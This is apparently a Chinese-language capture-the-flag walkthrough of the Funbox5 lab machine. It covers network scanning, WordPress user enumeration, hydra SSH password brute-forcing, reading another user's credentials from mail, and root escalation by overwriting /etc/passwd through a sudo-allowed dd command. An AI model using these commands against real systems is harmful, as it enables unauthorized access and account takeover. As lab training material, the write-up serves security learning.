1、找到靶机ip:192.168.75.10
nmap -sn 192.168.75.0/24
2、扫描靶机端口
root@chounana:~# nmap -p- -A 192.168.75.10
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.75.10
Host is up (0.00044s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 af:ae:39:e2:da:bb:6f:1a:6b:04:ec:36:29:d9:0c:ea (RSA)
| 256 1d:d7:ef:2c:85:bf:0d:fc:e2:60:85:22:42:8d:cc:4d (ECDSA)
|_ 256 a0:a4:6d:d9:ca:3e:71:a1:31:ea:a2:7e:42:63:13:74 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:4D:A4:E9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms 192.168.75.10
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.00 seconds
3、访问80端口是默认的apache页面,手动尝试了一下robots.txt文件,发现一个,但是试了发现没有,想到下载页面的提示,这里就没有深究
4、扫描网站目录,这里推荐直接使用dirb扫描,因为它会自动往下级目录扫描,比较快,扫到一个drupal目录,如果根据第一印象,这应该是drupal cms,所以是去访问然后查看它是哪个版本的,然后利用相关exploit脚本攻击,但是这里不能访问,会被重定向到192.168.178.33,这是访问不到的,这个也能联想到前面的提示
dirb http://192.168.75.10
但是dirb继续在这个目录下探测却发现了不一样的东西,就是有wp网站的特征目录
在之前的目录下拼上index.php发现是可以访问的,还有wp-content目录也是可以访问的,那么接下来就直接上神器wpscan扫描用户,至于wpscan的用法我前面有一篇文章讲过,这里不做赘述,这里扫描的时候需要指定wp-content的目录
wpscan --url http://192.168.75.10/drupal/index.php --wp-content-dir=http://192.168.75.10/drupal/wp-content --api-token=[你自己的] --enumerate u,p
发现有两个用户,admin和ben,由于wp-admin不能访问,所以尝试直接使用ben用户爆破ssh登录
5、爆破出用户ben的密码为pookie
hydra -l ben -P /usr/share/wordlists/rockyou.txt ssh://192.168.75.10
ssh登录上去
root@chounana:~# ssh ben@192.168.75.10
ben@192.168.75.10's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-189-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Introducing self-healing high availability clusters in MicroK8s.
Simple, hardened, Kubernetes for production, from RaspberryPi to DC.
https://microk8s.io/high-availability
0 packages can be updated.
0 updates are security updates.
New release '18.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
You have mail.
ben@funbox5:~$
尝试一些常规的手段收集一些信息,没有什么能提权的文件,在home目录下有另外两个用户文件夹,但是都没有权限访问
前面登录进来的时候提示有邮件,id查看一下用户组,发现ben属于mail组,但是不能直接使用mail命令进行查看,使用命令查看后台监听端口,发现110端口,就是邮件端口
ben@funbox5:~$ mail
-bash: /usr/bin/mail: Permission denied
ben@funbox5:~$ id
uid=1001(ben) gid=1001(ben) groups=1001(ben),8(mail)
ben@funbox5:~$ netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 192.168.75.10:22 192.168.75.6:57120 ESTABLISHED -
tcp 0 0 192.168.75.10:22 192.168.75.6:57118 ESTABLISHED -
tcp 0 0 192.168.75.10:22 192.168.75.6:58214 ESTABLISHED -
tcp6 0 0 :::110 :::* LISTEN -
tcp6 0 0 :::143 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
ben@funbox5:~$
使用telnet命令连接到本地的110端口,使用ben的用户名和密码进行登录,使用list指令列举邮件,发现有三封,使用retr命令查看内容,在第三封发现有用信息,得到adam的用户名和密码
6、切换到adam用户,使用sudo -l命令发现可以使用root身份运行dd命令,可以使用这个命令来修改/etc/passwd文件,从而修改root密码来提权
先使用dd命令将/etc/passwd复制到当前文件夹,由于adam用户没有修改权限,所以将其下载到本地,生成一个以root为密码的密文,然后使用root身份进行修改,然后在发送到靶机上,然后再通过dd命令将修改过后的passwd复制到/etc/目录下,从而覆盖之前的文件,达到修改目的,最终拿到flag
adam@funbox5:~$ sudo dd if=/etc/passwd of=./passwd
3+1 records in
3+1 records out
2020 bytes (2.0 kB, 2.0 KiB) copied, 0.000882335 s, 2.3 MB/s
adam@funbox5:~$ ls -l
total 4
-rw-r--r-- 1 root root 2020 Dec 1 09:42 passwd
adam@funbox5:~$ sudo dd if=/tmp/passwd of=/etc/passwd
4+1 records in
4+1 records out
2125 bytes (2.1 kB, 2.1 KiB) copied, 0.000988471 s, 2.1 MB/s
adam@funbox5:~$
root@chounana:~# scp adam@192.168.75.10:/home/adam/passwd ./
adam@192.168.75.10's password:
passwd 100% 2020 608.4KB/s 00:00
root@chounana:~# mkpasswd -m sha-512 root
$6$ImAMkOwZsS5l0HWf$89q5Yu10SuCABYJAIfEGTadihE/z3qCWwKK.DWEv8yaK7vfPEGOjQEWJMAD7M.IVEsS0urAvoKWq.kpe7N1Tu/
root@chounana:~# gedit passwd
(gedit:2121): Gtk-WARNING **: 16:48:24.742: Calling org.xfce.Session.Manager.Inhibit failed: GDBus.Error:org.freedesktop.DBus.Error.UnknownMethod: No such method “Inhibit”
root@chounana:~# cat passwd
root:$6$TOGT8tMexiscr/d6$IQ7akQ46BDvaChD5KPIiJo0MGn312E4s6SzEemahMjw78urvkyND5pkKtpAssgmS0whoXRsBanYrwhvT4RqXH1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
postfix:x:111:117::/var/spool/postfix:/bin/false
dovecot:x:112:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:113:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
maria:x:1000:1000:,,,:/home/maria:/bin/bash
ben:x:1001:1001:,,,:/home/ben:/bin/bash
smmta:x:115:123:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:124:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
adam:x:1002:1002:,,,:/home/adam:/bin/bash
root@chounana:~#
root@chounana:~# scp passwd adam@192.168.75.10:/tmp/passwd
adam@192.168.75.10's password:
Connection closed by 192.168.75.10 port 22
lost connection
root@chounana:~# scp passwd adam@192.168.75.10:/tmp/passwd
adam@192.168.75.10's password:
passwd 100% 2125 2.1MB/s 00:00
adam@funbox5:~$ sudo dd if=/tmp/passwd of=/etc/passwd
4+1 records in
4+1 records out
2125 bytes (2.1 kB, 2.1 KiB) copied, 0.000988471 s, 2.1 MB/s
adam@funbox5:~$ su - root
Password:
root@funbox5:~# ls
flag.txt
root@funbox5:~# cat flag.txt
_______ _ ______ _ _
(_______) | | | ___ \ _ | | | |
_____ _ _ ____ | | _ ___ _ _ _ | | | | ____ _ _| |_ | | ____ _ _ ____| |
| ___) | | | _ \| || \ / _ ( \ / |_) | | | |/ _ | \ / ) _) | | / _ ) | | / _ ) |
| | | |_| | | | | |_) ) |_| ) X ( _ | | | ( (/ / ) X (| |__ | |____( (/ / \ V ( (/ /| |
|_| \____|_| |_|____/ \___(_/ \_|_) |_| |_|\____|_/ \_)\___) |_______)____) \_/ \____)_|
Made with ❤ by @0815R2d2
Please, tweet me a screenshot on Twitter.
THX 4 playing this Funbox.
root@funbox5:~#